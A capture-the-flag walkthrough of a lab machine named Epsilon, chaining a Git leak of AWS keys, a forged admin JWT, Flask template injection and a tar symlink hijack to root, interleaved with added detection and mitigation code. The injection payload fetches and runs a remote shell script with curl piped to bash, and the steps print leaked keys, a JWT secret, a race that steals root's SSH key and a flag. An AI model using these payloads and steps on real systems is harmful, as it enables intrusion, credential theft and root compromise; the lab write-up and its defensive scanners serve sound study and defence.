[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijack) Privilege Escalation
Word count: 923 | 2025-08-29 08:30:18
Epsilon: Complete Guide to Penetration Testing and Privilege Escalation on the Machine
Information Gathering
Initial Scan
Target IP: 10.10.11.134
Open ports:
- 22/tcp - OpenSSH 8.2p1 Ubuntu
- 80/tcp - Apache httpd 2.4.41 (returns 403)
- 5000/tcp - Werkzeug httpd 2.0.2 (Python 3.8.10)
Host Discovery and Port Scan
ip='10.10.11.134'; itf='tun0'
# Reachability check: -sn is a ping scan. It must not be combined with -Pn, which
# skips host discovery and makes nmap report "Host is up" for any address.
if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    # Full TCP and UDP sweep; collect the open port numbers as a comma-separated list
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
        # Version detection and default scripts only against the discovered ports
        nmap -Pn -sV -sC -p "$ports" "$ip"
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
Exploiting the Git Information Leak
Discovering and Downloading the Git Repository
dirb http://10.10.11.134
git-dumper http://10.10.11.134/.git/ /tmp/res
Key File Analysis
Two important files were found:
- server.py - the Flask application
- track_api_CR_148.py - contains AWS credentials
AWS Credential Leak and Abuse
Extracting the AWS Credentials
Obtained from the Git history:
git log -p --all
AWS credentials found:
- Access Key ID: AQLA5M37BDN6FJP76TDC
- Secret Access Key: OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A
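Credentials like these are found by reading the history by hand above; the same check can be automated as a pre-receive or CI gate. The following is an added example, not code from the walkthrough: a small scanner over `git log -p` output that reports credential-looking values in added lines. The sample log text is constructed (placeholder commit ids, the file name and values are the ones the write-up reports); note that the leaked key ID does not carry one of the usual AWS prefixes, which is why the rules keyed on the setting name matter more than the prefix rule.

```python
import re
from typing import List, Tuple

# Name-based rules: a 20-char ID or 40-char secret assigned to an AWS-named setting.
NAMED_KEY_ID = re.compile(r"(?i:aws_access_key_id)\s*[=:]\s*['\"]?([A-Z0-9]{20})\b")
NAMED_SECRET = re.compile(
    r"(?i:aws_secret_access_key)\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"
)
# Prefix-based rule for key IDs that use the documented AWS prefixes.
PREFIXED_KEY_ID = re.compile(r"\b(?:AKIA|ASIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|APKA)[A-Z0-9]{16}\b")

Finding = Tuple[str, str, str]  # (short commit id, kind, value)

# Constructed `git log -p` excerpt: one commit adds the credentials, a later one
# replaces them with environment lookups. Commit ids are placeholders.
SAMPLE_LOG = """\
commit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Author: dev <dev@example.invalid>

    add tracking api

diff --git a/track_api_CR_148.py b/track_api_CR_148.py
--- /dev/null
+++ b/track_api_CR_148.py
+import boto3
+session = boto3.Session(
+    aws_access_key_id='AQLA5M37BDN6FJP76TDC',
+    aws_secret_access_key='OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A',
+    region_name='us-east-1')
commit bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Author: dev <dev@example.invalid>

    move creds to environment

diff --git a/track_api_CR_148.py b/track_api_CR_148.py
--- a/track_api_CR_148.py
+++ b/track_api_CR_148.py
-    aws_access_key_id='AQLA5M37BDN6FJP76TDC',
-    aws_secret_access_key='OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A',
+    aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],
+    aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],
"""


def scan_git_log(log_text: str) -> List[Finding]:
    """Walk `git log -p` output and report credential-looking values in added lines.

    Removed lines are ignored on purpose: a later commit deleting the secret does
    not undo the leak, and the finding is attributed to the commit that added it.
    """
    findings: List[Finding] = []
    commit = "unknown"
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:12]
            continue
        # Only lines the commit added; '+++' is the diff file header, not content
        if not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        for kind, pattern in (("access_key_id", NAMED_KEY_ID), ("secret_access_key", NAMED_SECRET)):
            m = pattern.search(added)
            if m:
                findings.append((commit, kind, m.group(1)))
        m = PREFIXED_KEY_ID.search(added)
        if m and not any(f[2] == m.group(0) for f in findings):
            findings.append((commit, "access_key_id", m.group(0)))
    return findings


if __name__ == "__main__":
    # In practice: git log -p --all | python3 scan_git_log.py
    for commit_id, kind, value in scan_git_log(SAMPLE_LOG):
        print(f"{commit_id}  {kind:<18} {value[:4]}...{value[-4:]}")
```

Once a key has reached a git history it has to be treated as disclosed and rotated; rewriting history removes it from the repository but not from any clone, mirror or cache that already received it.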
Configuring the AWS CLI
aws configure
Enter the obtained credentials and the region us-east-1.
Listing Lambda Functions
aws --endpoint-url=http://cloud.epsilon.htb lambda list-functions
Getting Details of a Specific Function
aws --endpoint-url=http://cloud.epsilon.htb lambda get-function --function-name=costume_shop_v1
The JWT secret is read from the response: RrXCvmrNe!K!4+5wYq
JWT Forgery and Authentication Bypass
Generating an Admin JWT Token
import jwt
# Sign an admin payload with the secret recovered from the Lambda function configuration
print("Cookie: auth=" + jwt.encode({"username": "admin", "password": "admin"}, "RrXCvmrNe!K!4+5wYq", algorithm="HS256"))
Verifying Against the Website
whatweb http://epsilon.htb:5000/home --cookie='auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA'
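The reason the forged cookie works is that an HS256 token proves only that whoever signed it knew the shared secret, and the application then takes the identity straight from the claims. The following is an added example, not part of the walkthrough, that implements HS256 signing and verification with the standard library only (no PyJWT) so the mechanics are visible: the secret and cookie value are the ones reported above, the rotated key name is a made-up placeholder, and `encode_hs256` mirrors PyJWT's compact JSON layout, which is why its header and payload segments match the cookie from the write-up.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Values reported in the walkthrough: the secret from the Lambda configuration and
# the cookie sent to the application afterwards.
LEAKED_KEY = "RrXCvmrNe!K!4+5wYq"
COOKIE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9."
    "r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA"
)


def b64url_encode(data: bytes) -> str:
    # JWT segments are base64url without padding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_hs256(payload: dict, key: str) -> str:
    """Build an HS256 JWT with the same compact JSON layout PyJWT uses."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signature = hmac.new(key.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(signature)}"


def verify_hs256(token: str, key: str) -> Optional[dict]:
    """Return the claims only if the signature is valid under `key`; otherwise None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_seg, body_seg, sig_seg = parts
    try:
        header = json.loads(b64url_decode(header_seg))
        # Pin the algorithm server-side instead of trusting the token's own header
        if header.get("alg") != "HS256":
            return None
        expected = hmac.new(key.encode(), f"{header_seg}.{body_seg}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_seg)):
            return None
        return json.loads(b64url_decode(body_seg))
    except (ValueError, UnicodeDecodeError):
        return None


def unverified_claims(token: str) -> dict:
    """What anyone can read without the key: JWT claims are encoded, not encrypted."""
    return json.loads(b64url_decode(token.split(".")[1]))


if __name__ == "__main__":
    print("claims in the cookie:", unverified_claims(COOKIE_TOKEN))
    minted = encode_hs256({"username": "admin", "password": "admin"}, LEAKED_KEY)
    print("accepted with leaked key:", verify_hs256(minted, LEAKED_KEY) is not None)
    print("accepted after rotation:", verify_hs256(minted, "rotated-key-placeholder") is not None)
```

The defensive takeaway is twofold: a signing secret stored in a Lambda function's configuration is readable by any principal allowed to call get-function, so it belongs in a secrets store and must be rotated once the access key leaks; and an application should not grant a role because a claim says `admin`, but because the token was issued by its own login flow for a user that actually holds that role.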
Exploiting Flask SSTI
Constructing the SSTI Payload
Injected through the costume parameter of the /order route:
costume={{request.application.__globals__.__builtins__.__import__('os').popen('curl+10.10.16.33/reverse.sh|bash').read()}}
Full HTTP Request
POST /order HTTP/1.1
Host: epsilon.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://epsilon.htb:5000
Connection: close
Referer: http://epsilon.htb:5000/order
Cookie: auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA
Upgrade-Insecure-Requests: 1
costume={{request.application.__globals__.__builtins__.__import__('os').popen('curl+10.10.16.33/reverse.sh|bash').read()}}&q=fff&addr=dddd
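From the defender's side, the request above is easy to spot in logs: a form value containing Jinja delimiters together with Python dunder attribute names has no business reaching an order form. The following is an added example, not from the walkthrough, of detection logic run over constructed sample requests (a simplified "METHOD PATH BODY" format, not a real server log). It flags template syntax alone as medium and template syntax combined with dunder or interpreter-access names as high, and it decodes the value once more to catch double-encoded braces.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote_plus

# Indicators: template delimiters, dunder attributes used to walk from a harmless
# object to the interpreter, and the names the write-up's payload relies on.
TEMPLATE_DELIM = re.compile(r"\{\{|\{%|\}\}|%\}")
DUNDER = re.compile(r"__[A-Za-z]+__")
DANGEROUS_NAMES = re.compile(r"__import__|__builtins__|__globals__|popen|subprocess")

# Constructed sample traffic; '-' stands for an empty body.
SAMPLE_REQUESTS = [
    "POST /order costume=batman&q=1&addr=street",
    "POST /order costume=%7B%7B7*7%7D%7D&q=1&addr=x",
    "POST /order costume={{request.application.__globals__.__builtins__}}&q=fff&addr=dddd",
    "GET /home -",
]


def score_param(value: str) -> Dict[str, bool]:
    """Indicator hits for one form value.

    parse_qs has already decoded the value once; decoding a second time catches
    double-encoded input such as %257B, which reaches the template engine as '{'.
    """
    decoded = unquote_plus(value)
    return {
        "template_syntax": bool(TEMPLATE_DELIM.search(decoded)),
        "dunder": bool(DUNDER.search(decoded)),
        "dangerous_name": bool(DANGEROUS_NAMES.search(decoded)),
    }


def flag_requests(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (path, parameter, severity) for requests whose form data looks like SSTI."""
    alerts: List[Tuple[str, str, str]] = []
    for line in lines:
        method, path, body = line.split(" ", 2)
        if method != "POST" or body == "-":
            continue
        for name, values in parse_qs(body, keep_blank_values=True).items():
            for value in values:
                hits = score_param(value)
                if not hits["template_syntax"]:
                    continue
                severity = "high" if (hits["dunder"] or hits["dangerous_name"]) else "medium"
                alerts.append((path, name, severity))
    return alerts


if __name__ == "__main__":
    for path, param, severity in flag_requests(SAMPLE_REQUESTS):
        print(f"{severity:<6} {path} parameter={param}")
```

Detection is a safety net, not the fix. The root cause is a template string built from user input (for example `render_template_string("..." + costume)`); the correct form passes the value in as a template variable (`render_template("order.html", costume=costume)`), where Jinja escapes it and never parses it as template code.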
Privilege Escalation: tar Symlink Hijack
Analyzing the Backup Script
The backup script was found to be vulnerable:
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
The -h (dereference) flag in this tar invocation makes tar follow symbolic links, so a symlink placed at /opt/backups/checksum is archived as the file it points to; that is what allows the hijack.
Exploitation Steps
- Monitor for the creation of the /opt/backups/checksum file
- Quickly replace it with a symlink pointing to root's SSH private key
- Wait for the backup to complete
ls -la /var/backups/web_backups/;
while ! [ -e /opt/backups/checksum ]; do :; done;
rm -rf /opt/backups/checksum && ln -sf /root/.ssh/id_rsa /opt/backups/checksum;
ls -la /var/backups/web_backups/
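The difference the -h flag makes can be reproduced safely in a throwaway directory, and the same rule can be used to audit backup jobs before they are deployed. The following is an added example, not part of the walkthrough: it assumes a tar that supports -h (GNU tar or bsdtar) and mktemp; every path is created under a temporary directory, and the "secret" file is constructed, so nothing touches /opt or /root.

```shell
#!/bin/sh
# Added example: show what tar stores for a symlink with and without -h, and
# audit a backup command line for symlink-dereferencing flags.

# Print "link" if the archive stores the symlink itself, "content" if tar followed
# it and stored the target file. $1 is the extra tar flag to test ("" or "-h").
tar_symlink_behaviour() {
    flags="$1"
    work=$(mktemp -d) || return 1
    mkdir -p "$work/secret" "$work/backup"
    printf 'constructed secret material\n' > "$work/secret/id_rsa"
    # The writable path the backup job reads, swapped for a link to the secret
    ln -s "$work/secret/id_rsa" "$work/backup/checksum"
    ( cd "$work" && tar -c $flags -f archive.tar backup/checksum ) 2>/dev/null
    entry=$(tar -tvf "$work/archive.tar" | head -n 1)
    rm -rf "$work"
    case "$entry" in
        l*) echo link ;;      # mode starts with 'l': the link was archived, not its target
        -*) echo content ;;   # regular file: the target's contents were copied in
        *)  echo unknown ;;
    esac
}

# Return 0 when a tar command line dereferences symlinks (-h inside a short-option
# cluster such as -chvf, or --dereference), 1 otherwise. Use it as a lint rule on
# cron jobs that archive paths other users can write to.
tar_dereferences() {
    case "$1" in *--dereference*) return 0 ;; esac
    for word in $1; do
        case "$word" in
            --*) ;;                # long options were handled above
            -*h*) return 0 ;;
        esac
    done
    return 1
}

echo "without -h: $(tar_symlink_behaviour '')"
echo "with -h:    $(tar_symlink_behaviour '-h')"
```

Mitigation follows directly: a backup job that runs as root must not dereference links in a directory other users can write to. Drop -h where it is not needed, or copy the inputs into a root-owned staging directory with `cp --no-dereference` and archive from there, and keep /opt/backups itself writable only by root.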
Key File Locations
- User flag: /home/user/user.txt (e1c8605ea5b043a7fc870cadea41d42a)
- Root flag: /root/root.txt
Summary
This machine involves several key vulnerabilities:
- Git information leak exposing AWS credentials
- Hard-coded JWT secret allowing authentication bypass
- Flask SSTI (server-side template injection)
- Symlink hijack in the tar backup script
By chaining these vulnerabilities, an attacker can go step by step from information gathering to root privileges.